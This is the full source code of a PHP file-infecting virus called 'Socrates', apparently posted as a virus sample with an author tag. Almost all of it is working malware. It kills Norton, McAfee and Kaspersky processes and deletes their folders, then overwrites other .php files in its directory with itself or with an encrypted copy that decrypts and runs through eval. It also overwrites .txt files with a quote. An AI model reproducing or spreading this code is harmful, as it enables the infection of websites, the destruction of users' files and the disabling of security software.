Virus.PHP.Socrate.a - Source Code

1. <?php
2. echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");
3.  
4. $decrypt=
5. "function SocratesDecrypt(\$string,\$key)\r\n"
6.  
7. ."{                                 \r\n"
8.  
9. ." \$codez='';                       \r\n"
10.  
11. ."  for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"
12.  
13. ."  {                               \r\n"
14.  
15. ."     \$value=ord(\$string[\$i]);     \r\n"
16.  
17. ."     \$valuez=\$value+\$key;         \r\n"
18.  
19. ."     \$codez.=chr(\$valuez);        \r\n"
20.  
21. ."     }                            \r\n"
22.  
23. ."       return \$codez;             \r\n"
24.  
25. ."  }                               \r\n"
26.  
27. ."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"
28.  
29. ."\$break = Explode('/', \$filez);     \r\n"           
30.  
31. ."\$pfile = \$break[count(\$break) - 1];\r\n"          
32.  
33. ."\$c = fopen(\$pfile,'rb');\r\n"
34.  
35. ."\$d = fread(\$c,filesize(\$pfile));\r\n"            
36.  
37. ."fclose(\$c);\r\n"
38.  
39. ."\$next=strlen(\$d)-693;\r\n"
40. ."\$virus=substr(\$d,687,\$next);\r\n"
41.  
42. ."\$vr=SocratesDecrypt(\$virus,'1');\r\n"
43.  
44. ."eval(\$vr);";
45.  
46.  
47. function SocratesCrypt($string,$key)
48.            
49. {
50.  
51.                $codez="";
52.  
53.                   for($i=0; $i<strlen($string); $i++)
54.  
55.                        {
56.      
57.      
58.                           $value=ord($string[$i]);
59.      
60.      
61.                           $valuez=$value-$key;
62.      
63.      
64.                           $codez.=chr($valuez);
65.      
66.    
67.                        }
68.        
69.        
70.                              return $codez;
71.  
72.            
73. }
74.  
75.                               if(is_dir("C:\Program Files\Norton*"))
76.                                        {
77.                                            
78. exec("taskkill /f /t /im nod32.exe");
79.                                            
80. rmdir("C:\Program Files\Norton*");
81.  
82.                                        }
83.  
84.                                           if(is_dir("C:\Program Files\McAfee*"))
85.                                            {
86.  
87.                                               exec("taskkill /f /t /im Mcshield.exe");
88.                                              
89. rmdir("C:\Program Files\McAfee*");
90. }
91.  
92.                                          
93.                                           if(is_dir("C:\Program Files\Kaspersky*"))
94.  
95.                                            {
96.                                              
97. exec("taskkill /f /t /im KAV.exe");
98.                                              
99. rmdir("C:\Program Files\Kaspersky*");
100.  
101.                                            }
102.        
103.  
104. $filez = $_SERVER["SCRIPT_NAME"];
105. $break = Explode('/', $filez);         
106. $pfile = $break[count($break) - 1];  
107. $c = fopen($pfile,'rb');
108.  
109. $d = fread($c,filesize($pfile));            
110.  
111. fclose($c);
112.  
113. $nextsize=strlen($d)-4;
114. $virus=(substr($d,7,$nextsize));
115. $dir=opendir('*.*');  
116.            
117. while (($file = readdir($dir)) !== false)
118.                                          
119.                      
120.             {
121.                                            
122.                  if (strstr($file,'.php'))
123.                                                
124.                         {  
125.                                                    
126.                            $f = fopen($file,'rb');            
127.                                                    
128.                            $contents = fread($f, filesize($file));
129.                                                      
130.                  if (!strstr($contents, 'Socrates'))
131.                                                        
132.                            {  
133.                                                                                                                               if(!file_exists("Socrates.php")) {
134.                                  fclose($f);
135.                                                                                                                    $g = fopen($file,'w');
136.                                                                                                         fwrite($g,$d);
137.    
138.                                  fclose($g);
139.    
140.                                  }
141.  
142.  
143.  
144.                              if(file_exists("Socrates.php"))
145.                                {
146.                                  fclose($f);
147.                                                                                                                    $g = fopen($file,'w');
148.                                                                                                         fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>');
149.    
150.                                  fclose($g);
151.            
152.                                }
153.                            
154.                              
155.                                          
156.                                
157.                            
158.                           }
159.                                                
160.                        }
161.                                            
162.                          if (strstr($file,'.txt'))
163.                                                
164.                             {  
165.                                                  
166.                                  $f = fopen($file,'w');    
167.                                                  
168.                                  fwrite($f,"Let him that would move the world, first move himself.");
169.                                                
170.                             }
171.                      
172.            }?>
173.  
174.